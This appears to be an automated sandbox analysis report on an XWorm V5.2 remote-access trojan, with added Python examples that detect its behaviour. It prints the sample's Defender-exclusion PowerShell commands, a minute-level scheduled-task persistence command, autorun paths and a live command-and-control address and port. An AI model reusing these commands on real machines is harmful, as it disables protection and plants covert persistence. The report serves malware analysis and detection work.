Windows Analysis Report
com surrogate.exe

Overview

General Information

Sample name: com surrogate.exe
Analysis ID: 1575693
MD5: 8843d79e5ece984ef952051cb5b4f601
SHA1: 72bb266a7aae0320f05276a0ed42753c2dc07f2b
SHA256: 80d44bb082a49dd49bf5926ea31ca0c225725daa4ba0614ae3ef1e121fdef89c
Tags: exe, XWorm, user-lontze7

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

(classification graph not included in this text export)

Process Tree

  • System is w10x64
  • com surrogate.exe (PID: 1184 cmdline: "C:\Users\user\Desktop\com surrogate.exe" MD5: 8843D79E5ECE984EF952051CB5B4F601)
    • powershell.exe (PID: 3448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'com surrogate.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\svchostt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchostt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7088 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchostt.exe (PID: 4192 cmdline: C:\Users\user\svchostt.exe MD5: 8843D79E5ECE984EF952051CB5B4F601)
  • svchostt.exe (PID: 4136 cmdline: "C:\Users\user\svchostt.exe" MD5: 8843D79E5ECE984EF952051CB5B4F601)
  • svchostt.exe (PID: 5916 cmdline: "C:\Users\user\svchostt.exe" MD5: 8843D79E5ECE984EF952051CB5B4F601)
  • svchostt.exe (PID: 7068 cmdline: C:\Users\user\svchostt.exe MD5: 8843D79E5ECE984EF952051CB5B4F601)
  • cleanup
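The process tree above shows the three host-side behaviours that the Sigma rules later in this report fire on: Defender exclusions added through powershell.exe with -ExecutionPolicy Bypass (Add-MpPreference only succeeds when the sample already runs elevated, but the attempt is worth alerting on either way), a scheduled task that relaunches svchostt.exe every minute with /RL HIGHEST, and the Run-key and Startup-folder autoruns. The following is an added example, not part of the Joe Sandbox report and not code from the sample: detection logic for those three behaviours, run over constructed Sysmon-style events that mirror the tree. The field names, the "5 minutes or less" trigger threshold and the correlation by actor PID are assumptions of the example.

```python
import re
from collections import defaultdict

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\System32\schtasks.exe"
SAMPLE = r"C:\Users\user\Desktop\com surrogate.exe"


def ps(args):
    """Command line of a powershell.exe child exactly as the sample spawns it."""
    return f'"{PS}" -ExecutionPolicy Bypass {args}'


# Constructed Sysmon-style events mirroring the process tree, the Run-key
# write and the Startup-folder write in the report (not copied from a log).
EVENTS = [
    {"kind": "process", "pid": 3448, "ppid": 1184, "image": PS,
     "cmdline": ps("Add-MpPreference -ExclusionPath 'C:\\Users\\user\\Desktop\\com surrogate.exe'")},
    {"kind": "process", "pid": 3616, "ppid": 1184, "image": PS,
     "cmdline": ps("Add-MpPreference -ExclusionProcess 'com surrogate.exe'")},
    {"kind": "process", "pid": 2288, "ppid": 1184, "image": PS,
     "cmdline": ps("Add-MpPreference -ExclusionPath 'C:\\Users\\user\\svchostt.exe'")},
    {"kind": "process", "pid": 6692, "ppid": 1184, "image": PS,
     "cmdline": ps("Add-MpPreference -ExclusionProcess 'svchostt.exe'")},
    {"kind": "process", "pid": 7088, "ppid": 1184, "image": SCHTASKS,
     "cmdline": f'"{SCHTASKS}" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\\Users\\user\\svchostt.exe"'},
    {"kind": "registry", "pid": 1184, "image": SAMPLE,
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchostt",
     "details": r"C:\Users\user\svchostt.exe"},
    {"kind": "file", "pid": 1184, "image": SAMPLE,
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostt.lnk"},
    # Benign control: a daily task pointing into System32 must not fire.
    {"kind": "process", "pid": 9001, "ppid": 9000, "image": SCHTASKS,
     "cmdline": f'"{SCHTASKS}" /create /sc daily /tn "Backup" /tr "C:\\Windows\\System32\\backup.cmd"'},
]

USER_PATH = re.compile(r"\\Users\\[^\\]+\\", re.I)   # anything under a user profile


def rule_defender_exclusion(ev):
    """PowerShell adding Defender exclusions (Add-/Set-MpPreference -Exclusion*)."""
    if ev["kind"] != "process" or not ev["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    cl = ev["cmdline"]
    if not re.search(r"(Add|Set)-MpPreference\s+-Exclusion(Path|Process|Extension)", cl, re.I):
        return None
    extra = " + execution policy bypass" if re.search(r"-ExecutionPolicy\s+Bypass", cl, re.I) else ""
    return "defender_exclusion" + extra


def rule_schtasks_persistence(ev):
    """schtasks /create with a minute-level trigger (assumed threshold: /mo <= 5)
    whose /tr target lives under a user profile."""
    if ev["kind"] != "process" or not ev["image"].lower().endswith("schtasks.exe"):
        return None
    cl = ev["cmdline"]
    if not re.search(r"/create", cl, re.I):
        return None
    mo = re.search(r"/sc\s+minute\s+/mo\s+(\d+)", cl, re.I)
    tr = re.search(r'/tr\s+"?([^"]+)"?', cl, re.I)
    if not (mo and int(mo.group(1)) <= 5 and tr and USER_PATH.search(tr.group(1))):
        return None
    extra = " + highest run level" if re.search(r"/RL\s+HIGHEST", cl, re.I) else ""
    return "schtasks_minute_persistence" + extra


def rule_autorun(ev):
    """Run-key value pointing into a user profile, or any Startup-folder write."""
    if ev["kind"] == "registry" and "\\currentversion\\run\\" in ev["target"].lower() \
            and USER_PATH.search(ev["details"]):
        return "run_key_autorun"
    if ev["kind"] == "file" and "\\start menu\\programs\\startup\\" in ev["target"].lower():
        return "startup_folder_write"
    return None


RULES = (rule_defender_exclusion, rule_schtasks_persistence, rule_autorun)


def detect(events):
    """Return (event pid, actor pid, finding) for every rule hit. The actor is
    the parent of a spawned process, or the writer of a registry/file event."""
    hits = []
    for ev in events:
        for rule in RULES:
            name = rule(ev)
            if name:
                hits.append((ev["pid"], ev.get("ppid", ev["pid"]), name))
    return hits


def correlate(hits):
    """Group distinct rule names by actor PID: one process doing all of
    exclusion, scheduled task and autorun is a far stronger signal than
    three unrelated alerts."""
    by_actor = defaultdict(set)
    for _pid, actor, name in hits:
        by_actor[actor].add(name.split(" + ")[0])
    return {actor: sorted(names) for actor, names in by_actor.items()}


if __name__ == "__main__":
    found = detect(EVENTS)
    for h in found:
        print(h)
    print(correlate(found))
```

Run against the constructed events, every finding is attributed to PID 1184, the sample itself, which is the pivot a responder would use to walk the rest of the tree; the daily System32 task produces nothing.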
Malware configuration (extracted): {"C2 url": ["127.0.0.1", "147.185.221.22"], "Port": 48990, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "msedge.exe", "Version": "XWorm V5.2"}
Yara matches

Source | Rule | Description | Author
com surrogate.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
com surrogate.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
com surrogate.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xb64c:$s6: VirtualBox
  • 0xb5aa:$s8: Win32_ComputerSystem
  • 0xcada:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xcb77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xcc8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xc0c8:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author
C:\Users\user\svchostt.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\svchostt.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\svchostt.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings: identical strings and offsets to the submitted sample (the dropped file has the same MD5, 8843d79e5ece984ef952051cb5b4f601).

Source | Rule | Description | Author
00000000.00000002.2897221401.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000000.1647881005.00000000009B2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000000.1647881005.00000000009B2000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xb44c:$s6: VirtualBox
  • 0xb3aa:$s8: Win32_ComputerSystem
  • 0xc8da:$cnc1, 0xc977:$cnc2, 0xca8c:$cnc3: the same three User-Agent strings as in the submitted sample
  • 0xbec8:$cnc4: POST / HTTP/1.1
00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xcd7c:$s6: VirtualBox
  • 0xccda:$s8: Win32_ComputerSystem
  • 0xe20a:$cnc1, 0xe2a7:$cnc2, 0xe3bc:$cnc3: the same three User-Agent strings as in the submitted sample
  • 0xd7f8:$cnc4: POST / HTTP/1.1
(1 further memory-dump match not shown in this export)

Source | Rule | Description | Author
0.0.com surrogate.exe.9b0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.0.com surrogate.exe.9b0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.0.com surrogate.exe.9b0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings: 0xb64c:$s6 VirtualBox, 0xb5aa:$s8 Win32_ComputerSystem, 0xcada:$cnc1, 0xcb77:$cnc2, 0xcc8c:$cnc3, 0xc0c8:$cnc4 POST / HTTP/1.1 (same offsets and strings as the submitted sample)
0.2.com surrogate.exe.2d2f730.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.com surrogate.exe.2d2f730.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0x984c:$s6: VirtualBox
  • 0x97aa:$s8: Win32_ComputerSystem
  • 0xacda:$cnc1, 0xad77:$cnc2, 0xae8c:$cnc3: the same three User-Agent strings as in the submitted sample
  • 0xa2c8:$cnc4: POST / HTTP/1.1
(3 further unpacked-PE matches not shown in this export)

Note that every string the MALWARE_Win_AsyncRAT rule matched on is generic (a VM vendor name, a WMI class, three stock browser User-Agents and a bare "POST / HTTP/1.1"), so it should not be read as an AsyncRAT attribution; the family call rests on the JoeSecurity_XWorm rule and the extracted configuration ("Version": "XWorm V5.2").

System Summary (Sigma matches)

Source: Process started | matched by four rules, authors: Florian Roth (Nextron Systems); frack113; Florian Roth (Nextron Systems); Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
  Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\com surrogate.exe", ParentImage: C:\Users\user\Desktop\com surrogate.exe, ParentProcessId: 1184, ParentProcessName: com surrogate.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe', ProcessId: 3448, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
  Data: Details: C:\Users\user\svchostt.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\com surrogate.exe, ProcessId: 1184, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchostt
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
  Data: EventID: 11, Image: C:\Users\user\Desktop\com surrogate.exe, ProcessId: 1184, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostt.lnk

Persistence and Installation Behavior

Source: Process started | Author: Joe Security
  Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\com surrogate.exe", ParentImage: C:\Users\user\Desktop\com surrogate.exe, ParentProcessId: 1184, ParentProcessName: com surrogate.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe", ProcessId: 7088, ProcessName: schtasks.exe

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-16T08:37:58.894044+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49791 | 147.185.221.22 | 48990 | TCP

AV Detection

Source: com surrogate.exe | Avira: detected
Source: C:\Users\user\svchostt.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: com surrogate.exe | Malware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "147.185.221.22"], "Port": 48990, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "msedge.exe", "Version": "XWorm V5.2"}
Source: C:\Users\user\svchostt.exe | ReversingLabs: Detection: 81%
Source: com surrogate.exe | Virustotal: Detection: 69%
Source: com surrogate.exe | ReversingLabs: Detection: 81%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\svchostt.exe | Joe Sandbox ML: detected
Source: com surrogate.exe | Joe Sandbox ML: detected
Source: com surrogate.exe | String decryptor: 127.0.0.1,147.185.221.22
Source: com surrogate.exe | String decryptor: 48990
Source: com surrogate.exe | String decryptor: <123456789>
Source: com surrogate.exe | String decryptor: <Xwormmm>
Source: com surrogate.exe | String decryptor: XWorm V5.2
Source: com surrogate.exe | String decryptor: msedge.exe
Source: com surrogate.exe | String decryptor: %Userprofile%
Source: com surrogate.exe | String decryptor: svchostt.exe
Source: com surrogate.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: com surrogate.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\catroot2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\System32\AppxSip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SYSTEM32\OpcServices.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\System32\wshext.dll

Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49791 -> 147.185.221.22:48990
Source: Malware configuration extractor | URLs: 127.0.0.1
Source: Malware configuration extractor | URLs: 147.185.221.22
Source: Yara match | File source: com surrogate.exe, type: SAMPLE
Source: Yara match | File source: 0.0.com surrogate.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\svchostt.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.4:49791 -> 147.185.221.22:48990
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 / Host: ip-api.com / Connection: Keep-Alive (no User-Agent header)
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 147.185.221.22
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: unknown | DNS query: name: ip-api.com
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.22 (11 connections)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: powershell.exe, 00000009.00000002.2152559804.00000131EF9A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.verisign.
Source: com surrogate.exe, 00000000.00000002.2897221401.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp, com surrogate.exe, 00000000.00000002.2897221401.0000000002D22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: com surrogate.exe, svchostt.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000001.00000002.1859144540.000001ED5BC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1968193322.00000214D4FC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2118773278.0000013190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1839830042.000001ED4BDFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908030194.00000214C5179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2013168284.0000013180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: com surrogate.exe, 00000000.00000002.2897221401.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp, com surrogate.exe, 00000000.00000002.2897221401.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1839830042.000001ED4BBD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908030194.00000214C4F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2013168284.0000013180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2199136137.0000016328151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1839830042.000001ED4BDFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908030194.00000214C5179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2013168284.0000013180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1865579182.000001ED63FE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000009.00000002.2155134281.00000131EFB40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.coV
Source: powershell.exe, 00000009.00000002.2155134281.00000131EFB40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.i
Source: powershell.exe, 00000001.00000002.1839830042.000001ED4BBD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908030194.00000214C4F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2013168284.0000013180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2199136137.0000016328151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1859144540.000001ED5BC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1968193322.00000214D4FC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2118773278.0000013190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
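The Networking section above shows the two network traits worth encoding: the C2 connections go straight to 147.185.221.22:48990 with no preceding DNS query (the ETPRO signature 2855924 fires on the first PING), and the only name resolved is ip-api.com, queried for the hosting field to learn whether the host sits in a data centre. The extracted configuration also lists 127.0.0.1 as a C2 entry, which a naive IOC export would push straight into a blocklist. The following is an added example, not code from the report or from the sample: it derives blockable indicators from the extracted config while dropping loopback and private placeholders, and runs a no-DNS/non-standard-port heuristic plus the ip-api.com check over constructed records that mirror the report. The record layout, the 300-second DNS window and the set of ports treated as standard are assumptions of the example.

```python
import ipaddress
import json
from collections import Counter

# Extracted configuration, verbatim from the report's config extractor output.
CONFIG = json.loads(
    '{"C2 url": ["127.0.0.1", "147.185.221.22"], "Port": 48990, "Aes key": "<123456789>", '
    '"SPL": "<Xwormmm>", "Install file": "msedge.exe", "Version": "XWorm V5.2"}'
)

# Constructed records mirroring the Networking section (not a real capture):
# one DNS lookup, the resolved ip-api.com connection, the hosting check sent
# without a User-Agent, and eleven C2 connections never preceded by DNS.
RECORDS = [
    {"t": 0.0, "kind": "dns", "src": "192.168.2.4", "name": "ip-api.com", "answer": "208.95.112.1"},
    {"t": 0.2, "kind": "tcp", "src": "192.168.2.4", "dst": "208.95.112.1", "dport": 80},
    {"t": 0.3, "kind": "http", "src": "192.168.2.4", "dst": "208.95.112.1", "dport": 80,
     "method": "GET", "host": "ip-api.com", "uri": "/line/?fields=hosting", "user_agent": None},
] + [
    {"t": 1.0 + 60 * i, "kind": "tcp", "src": "192.168.2.4", "dst": "147.185.221.22", "dport": 48990}
    for i in range(11)
]

STANDARD_PORTS = {53, 80, 443}   # assumption: missing DNS alone is not suspicious here


def c2_indicators(cfg):
    """Blockable (host, port) pairs from the config. Loopback, private,
    link-local and unspecified addresses are builder placeholders, not C2."""
    pairs = set()
    for host in cfg["C2 url"]:
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:            # a hostname: keep it for DNS-based blocking
            pairs.add((host, cfg["Port"]))
            continue
        if ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified:
            continue
        pairs.add((str(ip), cfg["Port"]))
    return pairs


def analyse(records, cfg, dns_window=300.0):
    """Count findings keyed by (rule, destination, port):
    c2_from_config     - destination matches an indicator from the config
    tcp_no_dns_nonstd  - TCP to a non-standard port with no DNS answer for
                         that IP within dns_window seconds (works without config)
    hosting_check      - GET to ip-api.com asking for the 'hosting' field
    http_no_user_agent - HTTP request carrying no User-Agent header"""
    iocs = c2_indicators(cfg)
    last_answer = {}                               # ip -> time it was last resolved
    hits = Counter()
    for rec in sorted(records, key=lambda r: r["t"]):
        if rec["kind"] == "dns":
            last_answer[rec["answer"]] = rec["t"]
        elif rec["kind"] == "http":
            if rec["host"] == "ip-api.com" and "fields=hosting" in rec["uri"]:
                hits[("hosting_check", rec["dst"], rec["dport"])] += 1
            if not rec.get("user_agent"):
                hits[("http_no_user_agent", rec["dst"], rec["dport"])] += 1
        elif rec["kind"] == "tcp":
            key = (rec["dst"], rec["dport"])
            if key in iocs:
                hits[("c2_from_config",) + key] += 1
            resolved_recently = (rec["dst"] in last_answer
                                 and rec["t"] - last_answer[rec["dst"]] <= dns_window)
            if not resolved_recently and rec["dport"] not in STANDARD_PORTS:
                hits[("tcp_no_dns_nonstd",) + key] += 1
    return dict(hits)


if __name__ == "__main__":
    print("indicators:", sorted(c2_indicators(CONFIG)))
    for key, n in sorted(analyse(RECORDS, CONFIG).items()):
        print(n, key)
```

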